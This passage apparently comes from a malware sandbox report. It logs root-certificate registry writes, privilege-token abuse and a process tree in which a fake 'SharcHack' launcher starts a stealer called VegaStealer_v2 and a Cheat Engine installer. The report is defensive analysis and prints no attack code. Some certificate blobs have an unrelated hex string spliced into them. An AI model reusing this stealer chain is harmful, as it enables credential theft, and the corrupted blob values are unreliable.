c91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 saBSI.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 saBSI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 saBSI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 saBSI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 saBSI.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3888 v2.exe 3888 v2.exe 3888 v2.exe 3888 v2.exe 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 1300 CheatEngine75.tmp 4804 3.exe 4804 3.exe 1412 powershell.exe 1412 powershell.exe 4804 3.exe 4804 3.exe 4804 3.exe 4804 3.exe 4804 3.exe 4804 3.exe 4956 powershell.exe 4956 powershell.exe 4804 3.exe 4804 3.exe 2264 powershell.exe 2264 powershell.exe 3028 updater.exe 3028 updater.exe 4724 powershell.exe 4724 powershell.exe 3028 updater.exe 3028 updater.exe 3028 updater.exe 3028 updater.exe 3028 updater.exe 3028 updater.exe 4816 powershell.exe 4816 powershell.exe 3028 updater.exe 3028 updater.exe 3028 updater.exe 3028 updater.exe 4636 conhost.exe 4636 conhost.exe 3028 updater.exe 3028 updater.exe 2100 conhost.exe 2100 conhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3888 v2.exe Token: SeDebugPrivilege 1412 powershell.exe Token: SeShutdownPrivilege 1484 powercfg.exe Token: SeCreatePagefilePrivilege 1484 powercfg.exe Token: SeShutdownPrivilege 4532 powercfg.exe Token: SeCreatePagefilePrivilege 4532 powercfg.exe Token: SeDebugPrivilege 4956 powershell.exe Token: SeShutdownPrivilege 4716 powercfg.exe Token: SeCreatePagefilePrivilege 4716 powercfg.exe Token: SeShutdownPrivilege 4276 powercfg.exe Token: SeCreatePagefilePrivilege 4276 powercfg.exe Token: SeIncreaseQuotaPrivilege 4956 powershell.exe Token: SeSecurityPrivilege 4956 powershell.exe Token: SeTakeOwnershipPrivilege 4956 powershell.exe Token: SeLoadDriverPrivilege 4956 powershell.exe Token: SeSystemProfilePrivilege 4956 powershell.exe Token: SeSystemtimePrivilege 4956 powershell.exe Token: SeProfSingleProcessPrivilege 4956 powershell.exe Token: SeIncBasePriorityPrivilege 4956 powershell.exe Token: SeCreatePagefilePrivilege 4956 powershell.exe Token: SeBackupPrivilege 4956 powershell.exe Token: SeRestorePrivilege 4956 powershell.exe Token: SeShutdownPrivilege 4956 powershell.exe Token: SeDebugPrivilege 4956 powershell.exe Token: SeSystemEnvironmentPrivilege 4956 powershell.exe Token: SeRemoteShutdownPrivilege 4956 powershell.exe Token: SeUndockPrivilege 4956 powershell.exe Token: SeManageVolumePrivilege 4956 powershell.exe Token: 33 4956 powershell.exe Token: 34 4956 powershell.exe Token: 35 4956 powershell.exe Token: 36 4956 powershell.exe Token: SeIncreaseQuotaPrivilege 4956 powershell.exe Token: SeSecurityPrivilege 4956 powershell.exe Token: SeTakeOwnershipPrivilege 4956 powershell.exe Token: SeLoadDriverPrivilege 4956 powershell.exe Token: SeSystemProfilePrivilege 4956 powershell.exe Token: SeSystemtimePrivilege 4956 powershell.exe Token: SeProfSingleProcessPrivilege 4956 powershell.exe Token: SeIncBasePriorityPrivilege 4956 powershell.exe Token: SeCreatePagefilePrivilege 4956 powershell.exe Token: SeBackupPrivilege 4956 powershell.exe Token: SeRestorePrivilege 4956 powershell.exe Token: SeShutdownPrivilege 4956 powershell.exe Token: SeDebugPrivilege 4956 powershell.exe Token: SeSystemEnvironmentPrivilege 4956 powershell.exe Token: SeRemoteShutdownPrivilege 4956 powershell.exe Token: SeUndockPrivilege 4956 powershell.exe Token: SeManageVolumePrivilege 4956 powershell.exe Token: 33 4956 powershell.exe Token: 34 4956 powershell.exe Token: 35 4956 powershell.exe Token: 36 4956 powershell.exe Token: SeIncreaseQuotaPrivilege 4956 powershell.exe Token: SeSecurityPrivilege 4956 powershell.exe Token: SeTakeOwnershipPrivilege 4956 powershell.exe Token: SeLoadDriverPrivilege 4956 powershell.exe Token: SeSystemProfilePrivilege 4956 powershell.exe Token: SeSystemtimePrivilege 4956 powershell.exe Token: SeProfSingleProcessPrivilege 4956 powershell.exe Token: SeIncBasePriorityPrivilege 4956 powershell.exe Token: SeCreatePagefilePrivilege 4956 powershell.exe Token: SeBackupPrivilege 4956 powershell.exe Token: SeRestorePrivilege 4956 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1300 CheatEngine75.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3120 wrote to memory of 4804 3120 SharcHack.exe 83 PID 3120 wrote to memory of 4804 3120 SharcHack.exe 83 PID 3120 wrote to memory of 5088 3120 SharcHack.exe 84 PID 3120 wrote to memory of 5088 3120 SharcHack.exe 84 PID 3120 wrote to memory of 5088 3120 SharcHack.exe 84 PID 3120 wrote to memory of 100 3120 SharcHack.exe 85 PID 3120 wrote to memory of 100 3120 SharcHack.exe 85 PID 3120 wrote to memory of 100 3120 SharcHack.exe 85 PID 5088 wrote to memory of 3888 5088 VegaStealer_v2.exe 86 PID 5088 wrote to memory of 3888 5088 VegaStealer_v2.exe 86 PID 5088 wrote to memory of 3888 5088 VegaStealer_v2.exe 86 PID 100 wrote to memory of 1300 100 CheatEngine75.exe 87 PID 100 wrote to memory of 1300 100 CheatEngine75.exe 87 PID 100 wrote to memory of 1300 100 CheatEngine75.exe 87 PID 1900 wrote to memory of 2100 1900 cmd.exe 100 PID 1900 wrote to memory of 2100 1900 cmd.exe 100 PID 4836 wrote to memory of 1484 4836 cmd.exe 101 PID 4836 wrote to memory of 1484 4836 cmd.exe 101 PID 4836 wrote to memory of 4532 4836 cmd.exe 102 PID 4836 wrote to memory of 4532 4836 cmd.exe 102 PID 4836 wrote to memory of 4716 4836 cmd.exe 103 PID 4836 wrote to memory of 4716 4836 cmd.exe 103 PID 1900 wrote to memory of 2216 1900 cmd.exe 104 PID 1900 wrote to memory of 2216 1900 cmd.exe 104 PID 4836 wrote to memory of 4276 4836 cmd.exe 105 PID 4836 wrote to memory of 4276 4836 cmd.exe 105 PID 1900 wrote to memory of 1280 1900 cmd.exe 106 PID 1900 wrote to memory of 1280 1900 cmd.exe 106 PID 1900 wrote to memory of 4592 1900 cmd.exe 107 PID 1900 wrote to memory of 4592 1900 cmd.exe 107 PID 1900 wrote to memory of 2180 1900 cmd.exe 108 PID 1900 wrote to memory of 2180 1900 cmd.exe 108 PID 1900 wrote to memory of 3608 1900 cmd.exe 109 PID 1900 wrote to memory of 3608 1900 cmd.exe 109 PID 1900 wrote to memory of 3320 1900 cmd.exe 110 PID 1900 wrote to memory of 3320 1900 cmd.exe 110 PID 1900 wrote to memory of 3564 1900 cmd.exe 111 PID 1900 wrote to memory of 3564 1900 cmd.exe 111 PID 1900 wrote to memory of 5088 1900 cmd.exe 112 PID 1900 wrote to memory of 5088 1900 